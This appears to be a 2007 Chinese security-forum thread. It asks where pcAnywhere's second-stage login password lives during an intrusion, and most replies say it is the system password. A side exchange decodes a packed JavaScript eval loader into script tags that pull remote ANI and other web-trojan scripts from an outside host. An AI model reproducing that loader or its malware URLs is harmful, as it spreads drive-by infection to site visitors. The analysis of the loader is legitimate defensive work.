[讨论]pcanywhere二次验证密码存放在哪？ pcanywhere, 密码, 验证, 讨论

valen886

[讨论]pcanywhere二次验证密码存放在哪？
议题作者：hackest
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

大家都知道pcanywhere是一个远程管理服务器的工具
但是在渗透中如何遇到服务器处于锁定状态
而我们又没有管理员权限的时候
也就是只拿到了pcanywhere的连接密码
却没有系统用户和密码
处于锁定状态的问题以前讨论过了
不过解决的方法貌似不太完美和实际

而且pcanywhere在连接上的时候即使没有管理员权限
也可以直接重启服务器
不过如果想要执行传送文件或者执行命令之类的操作就会要求进行二次验证
这个密码和pcanywhere的连接密码试了很多都没有发现相同的
不知道它的密码存放在哪里
总之找遍了*.cif文件所得的密码都无法通过验证！
难道是要求验证系统用户？！
希望大家讨论下，指点下小弟，嘿嘿My Blog：http://www.hackest.cn/ [H.S.T]：http://www.hackm.com/

帖子882 精华20 积分5849 阅读权限150 性别男 来自广东 在线时间941 小时 注册时间2006-10-12 最后登录2008-3-3 查看个人网站
查看详细资料TOP 良辰择日，预测咨询，公司改名，权威易经


寂寞宝贝
荣誉会员

虎儿

二次验证密码?不会呀!我要传的话他直接让我输系统的.........成功的男人白天瞎JB忙，晚上JB瞎忙；失败的男人白天没啥鸟事，晚上鸟没啥事。

帖子428 精华12 积分4620 阅读权限100 性别男 来自云南 在线时间172 小时 注册时间2006-2-7 最后登录2008-7-16 查看个人网站
查看详细资料TOP 爱要怎么说出口

抗战二十年
晶莹剔透§烈日灼然

小小夏

兄弟借个地方用一下 因为我不能发贴 谢谢！
--------------------------------------------------------
谁能帮我解密这段代码

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?&#39;&#39;:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!&#39;&#39;.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return&#39;\\w+&#39;};c=1};while(c--)if(k[c])p=p.replace(new RegExp(&#39;\\b&#39;+e(c)+&#39;\\b&#39;,&#39;g&#39;),k[c]);return p}(&#39;A("\\7\\9\\m\\6\\l\\k\\c\\c\\1\\h\\2\\4\\5\\7\\8\\0\\l\\2\\5\\4\\k\\b\\1\\t\\0\\0\\8\\s\\3\\3\\e\\2\\r\\q\\a\\4\\6\\f\\3\\6\\p\\3\\z\\d\\5\\9\\n\\f\\a\\o\\2\\b\\1\\g\\h\\3\\2\\4\\5\\7\\8\\0\\g\\1\\c\\u\\1\\b\\9\\1\\u\\j\\i\\c\\c\\1\\h\\2\\4\\5\\7\\8\\0\\l\\2\\5\\4\\k\\b\\1\\t\\0\\0\\8\\s\\3\\3\\e\\2\\r\\q\\a\\4\\6\\f\\3\\6\\p\\3\\y\\d\\e\\a\\o\\2\\b\\1\\g\\h\\3\\2\\4\\5\\7\\8\\0\\g\\1\\j\\i\\j\\i\\x\\6\\4\\n\\f\\d\\9\\0\\a\\e\\5\\7\\0\\d\\w\\7\\9\\m\\6\\v")&#39;,37,37,&#39;164|42|163|57|143|162|157|151|160|156|56|134|11|145|167|155|76|74|12|15|75|40|146|165|152|113|61|71|72|150|53|51|50|144|116|126|eval&#39;.split(&#39;|&#39;),0,{}))

代码地址 http://7y7.us/2.js不经风雨，怎见彩虹？
帖子30 精华0 积分68 阅读权限40 性别男 在线时间31 小时 注册时间2006-10-11 最后登录2008-4-26 查看详细资料TOP 少女暴富的隐秘（图）

netpatch
荣誉会员

阿翠

第一层加密
解后
eval("\151\156\146\157\40\75\11\11\42\74\163\143\162\151\160\164\40\163\162\143\75\134\42\150\164\164\160\72\57\57\167\163\71\61\56\143\157\155\57\157\113\57\126\145\162\156\165\155\56\152\163\134\42\76\74\57\163\143\162\151\160\164\76\42\11\53\42\134\156\42\53\15\12\11\11\42\74\163\143\162\151\160\164\40\163\162\143\75\134\42\150\164\164\160\72\57\57\167\163\71\61\56\143\157\155\57\157\113\57\116\145\167\56\152\163\134\42\76\74\57\163\143\162\151\160\164\76\42\15\12\15\12\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\151\156\146\157\51")
第二层加密
解后
info =    "<script src=\"http://ws91.com/oK/Vernum.js\"></script>"  +"\n"+
    "<script src=\"http://ws91.com/oK/New.js\"></script>"

document.write(info)

ANI网马!通往胜利的路不只一条！
帖子89 精华4 积分3262 阅读权限100 在线时间212 小时 注册时间2005-3-23 最后登录2008-7-2 查看详细资料TOP

netpatch
荣誉会员

凡人

http://ws91.com/oK/Vernum.js //014网马
http://ws91.com/oK/New.js //ANI网马通往胜利的路不只一条！
帖子89 精华4 积分3262 阅读权限100 在线时间212 小时 注册时间2005-3-23 最后登录2008-7-2 查看详细资料TOP 少女暴富的隐秘（图）

vikxeo
荣誉会员

wwgywl

alert 再 八进制 就ok
帖子58 精华2 积分182 阅读权限100 性别男 在线时间283 小时 注册时间2005-8-14 最后登录2008-6-6 查看详细资料TOP 良辰择日，预测咨询，公司改名，权威易经

huangqing
晶莹剔透§烈日灼然

betty

七贱的，，
他那个网马生成的密码，
搞笑死了，
不知道你知道不知道密码，密码是wokankan
有需要的可以去
偶不是罐水哦

帖子13 精华0 积分48 阅读权限40 性别男 在线时间83 小时 注册时间2007-1-10 最后登录2008-7-23 查看详细资料TOP 让女孩一夜变的更有女人味

hackest
运维管理组

BG7LHT

我汗，我的问题没解决
倒解决了你的问题，晕哦
正所谓强宾不压主  My Blog：http://www.hackest.cn/ [H.S.T]：http://www.hackm.com/

帖子882 精华20 积分5849 阅读权限150 性别男 来自广东 在线时间941 小时 注册时间2006-10-12 最后登录2008-3-3 查看个人网站
查看详细资料TOP

ttfct
荣誉会员

网飞鸿

跑题了,晕猪,回答的毛的问题哦!

管理员都不看一下索?TTFCT http://WWW.TTFCT.COM

帖子279 精华4 积分4349 阅读权限100 性别男 在线时间111 小时 注册时间2006-2-13 最后登录2008-7-20 查看详细资料TOP

hackest
运维管理组

Cici

貌似那个不叫二次加密咧
据说就是系统的密码，晕哦！
那岂不是没戏了，郁闷  My Blog：http://www.hackest.cn/ [H.S.T]：http://www.hackm.com/

帖子882 精华20 积分5849 阅读权限150 性别男 来自广东 在线时间941 小时 注册时间2006-10-12 最后登录2008-3-3 查看个人网站
查看详细资料TOP

hhiijj123
晶莹剔透§烈日灼然

马自达

引用:
引用第9楼hackest于2007-04-19 16:42发表的 :
貌似那个不叫二次加密咧
据说就是系统的密码，晕哦！
那岂不是没戏了，郁闷  
是啊 就是系统密码 没有听说什么二次加密的DD
帖子2 精华0 积分9 阅读权限40 性别男 在线时间4 小时 注册时间2006-8-23 最后登录2007-4-19 查看详细资料TOP

陆羽
荣誉会员

5000564

引用:
引用第6楼huangqing于2007-04-19 16:10发表的 :
七贱的，，
他那个网马生成的密码，
搞笑死了，
不知道你知道不知道密码，密码是wokankan
有需要的可以去
.......
楼上不好意思
人家换密码了~.
呵呵
现在是nikankan
帖子11 精华0 积分38 阅读权限100 在线时间14 小时 注册时间2005-12-22 最后登录2008-7-8 查看详细资料TOP

heiye88
晶莹剔透§烈日灼然

dghgs

写个解密页面吧。。。大大们。。。ALERT出来后的数据如何能复制呀。。。比如alert("aaa") 弹出对话框呀。。如何把弹出来的数据复制出来。。谢谢。。
帖子64 精华0 积分239 阅读权限40 在线时间124 小时 注册时间2007-1-25 最后登录2008-7-18 查看详细资料TOP

heiye88
晶莹剔透§烈日灼然

小树

<SCRIPT LANGUAGE="JavaScript">
alert("\x61\x6C\x65\x72\x74\x28\x22\u9ED1\u5BA2\u9632\u7EBF\x22\x29\x3B")
</SCRIPT>



就会弹出对话框告诉你解密后的结果！
如何保存这个结果呀。。。。。。。。。
帖子64 精华0 积分239 阅读权限40 在线时间124 小时 注册时间2007-1-25 最后登录2008-7-18 查看详细资料TOP

kiss8888
晶莹剔透§烈日灼然

凯旋归来

引用:
引用第3楼netpatch于2007-04-19 14:07发表的 :
第一层加密
解后
eval("151156146157407511114274163143162151160164401631621437513442150164164160725757167163716156143157155571571135712614516215616515556152163134427674571631431621511601647642115342134156425315121111427416314316215116016440163162143751344215016416416072575716716371615614315715557157113571161451675615216313442767457163143162151160164764215121512144157143165155145156164561671621511641455015115614615751")
第二层加密
解后
.......
俺是一个菜鸟，请问：\\7\\9\\m\\6\\l\\k\\c\\c\\1\\h\\2\\4\\5\\7\\8\\0\\l\\2\\5\\4\\k\\b\\1\\t\\0\\0\\8\\s\\3\\3\\e\\2\\r\\q\\a\\4\\6\\f\\3\\6\\p\\3\\z\\d\\5\\9\\n\\f\\a\\o\\2\\b\\1\\g\\h\\3\\2\\4\\5\\7\\8\\0\\g\\1\\c\\u\\1\\b\\9\\1\\u\\j\\i\\c\\c\\1\\h\\2\\4\\5\\7\\8\\0\\l\\2\\5\\4\\k\\b\\1\\t\\0\\0\\8\\s\\3\\3\\e\\2\\r\\q\\a\\4\\6\\f\\3\\6\\p\\3\\y\\d\\e\\a\\o\\2\\b\\1\\g\\h\\3\\2\\4\\5\\7\\8\\0\\g\\1\\j\\i\\j\\i\\x\\6\\4\\n\\f\\d\\9\\0\\a\\e\\5\\7\\0\\d\\w\\7\\9\\m\\6\\“
这是用什么工具加密的？谢谢。
帖子1 精华0 积分9 阅读权限40 在线时间7 小时 注册时间2007-2-21 最后登录2008-7-4 查看详细资料TOP

heiye88
晶莹剔透§烈日灼然

callach

顶！<SCRIPT LANGUAGE="JavaScript">
alert("\x61\x6C\x65\x72\x74\x28\x22\u9ED1\u5BA2\u9632\u7EBF\x22\x29\x3B")
</SCRIPT>



就会弹出对话框告诉你解密后的结果！
如何保存这个结果呀。。。。。。。。。
帖子64 精华0 积分239 阅读权限40 在线时间124 小时 注册时间2007-1-25 最后登录2008-7-18 查看详细资料TOP

hackest
运维管理组

飞翔吧

那个是转换过的十六进制数啦
\x61\x6C\x65\x72\x74\x28\x22\u9ED1\u5BA2\u9632\u7EBF\x22\x29\x3B
这些是十六进制形式的了！My Blog：http://www.hackest.cn/ [H.S.T]：http://www.hackm.com/

帖子882 精华20 积分5849 阅读权限150 性别男 来自广东 在线时间941 小时 注册时间2006-10-12 最后登录2008-3-3 查看个人网站
查看详细资料TOP

heiye88
晶莹剔透§烈日灼然

fulu

楼上的你没看明白我的意思呵呵。。我是说如何将alert后的结果保存出来...他是个对话框。。。如何复制出来解密后的数据。。。
帖子64 精华0 积分239 阅读权限40 在线时间124 小时 注册时间2007-1-25 最后登录2008-7-18 查看详细资料TOP

寂寞宝贝
荣誉会员

伤人

我R./........你们搞什么飞机,看清楚这个论题,这不是解密的................要研究专门开个帖子,害得我还以为有牛人弄出那什么二次密码了!成功的男人白天瞎JB忙，晚上JB瞎忙；失败的男人白天没啥鸟事，晚上鸟没啥事。

帖子428 精华12 积分4620 阅读权限100 性别男 来自云南 在线时间172 小时 注册时间2006-2-7 最后登录2008-7-16 查看个人网站
查看详细资料TOP

hackest
运维管理组

zhcaihhhh

我也晕了啦
发个帖子被借掉了
下次不敢发了…… My Blog：http://www.hackest.cn/ [H.S.T]：http://www.hackm.com/

帖子882 精华20 积分5849 阅读权限150 性别男 来自广东 在线时间941 小时 注册时间2006-10-12 最后登录2008-3-3 查看个人网站
查看详细资料TOP

heiye88
晶莹剔透§烈日灼然